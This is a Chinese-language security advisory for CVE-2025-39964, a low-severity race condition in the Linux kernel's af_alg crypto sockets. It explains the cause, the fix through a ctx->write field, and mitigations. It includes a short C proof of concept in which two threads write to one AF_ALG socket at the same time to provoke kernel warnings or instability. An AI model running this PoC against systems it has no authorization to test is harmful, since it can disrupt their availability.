CVE-2025-39964 Linux内核af_alg并发写入漏洞

漏洞信息

漏洞编号

CVE-2025-39964

漏洞类型

竞争条件/并发访问漏洞

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (crypto: af_alg 子系统)

漏洞概述

CVE-2025-39964是Linux内核中crypto: af_alg子系统中的一个并发写入漏洞。该漏洞源于af_alg套接字未对并发写入操作进行适当的同步控制。在Linux内核的AF_ALG套接字接口中，应用程序可以通过sendmsg系统调用向af_alg套接字发送数据以执行加密操作。然而，当多个线程或进程同时对同一个af_alg套接字执行写入操作时，由于缺乏互斥机制，会导致数据以不可预测的方式交错混合，同时可能引发套接字内部状态的不一致问题。该漏洞的CVSS评分为3.3，属于低危级别。攻击者需要本地访问权限和低权限账户即可触发此漏洞，无需用户交互。虽然该漏洞不会导致机密性泄露或数据完整性破坏，但可能导致系统可用性降低，例如造成内核态数据处理异常或触发内核警告。Linux内核维护者通过引入ctx->write字段来实现写入操作的独占所有权机制，从而修复了该问题。此漏洞影响多个稳定版本的Linux内核，需要通过内核更新来修复。

技术细节

从技术层面分析，该漏洞存在于Linux内核的crypto: af_alg模块中。AF_ALG套接字是Linux内核提供的加密操作接口，允许用户空间程序通过套接字API访问内核的加密子系统。

漏洞的根本原因是af_alg_sendmsg函数在处理写入请求时没有对并发访问进行保护。当两个或多个线程同时调用sendmsg向同一个af_alg套接字写入数据时，会产生以下问题：

1. **数据交错**：多个写入请求的数据会在内核缓冲区中以不可预测的顺序混合，导致最终传递给加密引擎的数据既不是线程A的完整数据，也不是线程B的完整数据，而是两者的混合片段。

2. **状态不一致**：af_alg套接字维护着内部状态信息（如当前操作模式、缓冲区偏移量等），并发写入可能导致这些状态变量被多个线程同时修改，产生竞态条件。

3. **内核稳定性影响**：不一致的状态可能导致后续操作产生未定义行为，包括内核oops或panic。

修复方案是通过添加ctx->write字段来实现写入操作的互斥。当一个线程开始写入时，该字段被设置以指示独占所有权，其他线程的写入请求将被拒绝或阻塞，直到当前写入完成。这种方法类似于文件操作中的FMODE_WRITE标志机制。

攻击链分析

STEP 1

步骤1：创建AF_ALG套接字

攻击者创建一个AF_ALG类型的套接字，并绑定到特定的加密算法（如hash/sha256），然后通过accept获取数据通信套接字。

STEP 2

步骤2：启动并发写入线程

攻击者启动两个或多个线程，同时通过sendmsg/send系统调用向同一个af_alg套接字发送数据。

STEP 3

步骤3：触发竞争条件

由于af_alg_sendmsg缺乏并发写入保护，多个线程的数据在内核缓冲区中交错，导致内部状态不一致。

STEP 4

步骤4：导致系统不稳定

不一致的内部状态可能导致内核警告、oops或panic，影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-39964 PoC - Concurrent write to af_alg socket
 * This PoC demonstrates the race condition in af_alg_sendmsg
 * by creating two threads that simultaneously write to the same
 * af_alg socket, causing data interleaving.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <linux/socket.h>

#ifndef AF_ALG
#define AF_ALG 38
#endif

static int alg_fd;

void *writer_thread(void *arg) {
    int id = *(int *)arg;
    char data[256];
    memset(data, 'A' + id, sizeof(data));

    for (int i = 0; i < 1000; i++) {
        /* Send data to af_alg socket - concurrent access triggers the bug */
        if (send(alg_fd, data, sizeof(data), 0) < 0) {
            perror("send");
        }
    }
    return NULL;
}

int main(void) {
    struct sockaddr_alg sa;
    pthread_t t1, t2;
    int id1 = 0, id2 = 1;

    /* Create AF_ALG socket */
    int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfm_fd < 0) {
        perror("socket AF_ALG");
        return 1;
    }

    /* Bind to hash algorithm (e.g., sha256) */
    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "hash");
    strcpy((char *)sa.salg_name, "sha256");

    if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(tfm_fd);
        return 1;
    }

    /* Accept connection to get data socket */
    alg_fd = accept(tfm_fd, NULL, NULL);
    if (alg_fd < 0) {
        perror("accept");
        close(tfm_fd);
        return 1;
    }

    /* Create two threads to write concurrently */
    pthread_create(&t1, NULL, writer_thread, &id1);
    pthread_create(&t2, NULL, writer_thread, &id2);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    close(alg_fd);
    close(tfm_fd);
    printf("Done - check kernel logs for warnings\n");
    return 0;
}

影响范围

Linux Kernel (多个稳定版本受影响，具体版本需参考各发行版安全公告)

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过以下措施进行临时缓解：1）在应用程序层面确保对同一af_alg套接字的写入操作使用互斥锁进行串行化；2）通过seccomp或AppArmor限制非特权进程对AF_ALG套接字（socket族38）的访问；3）监控系统日志中与af_alg相关的内核警告信息，及时发现异常行为；4）避免多线程程序共享同一个af_alg套接字进行写入操作。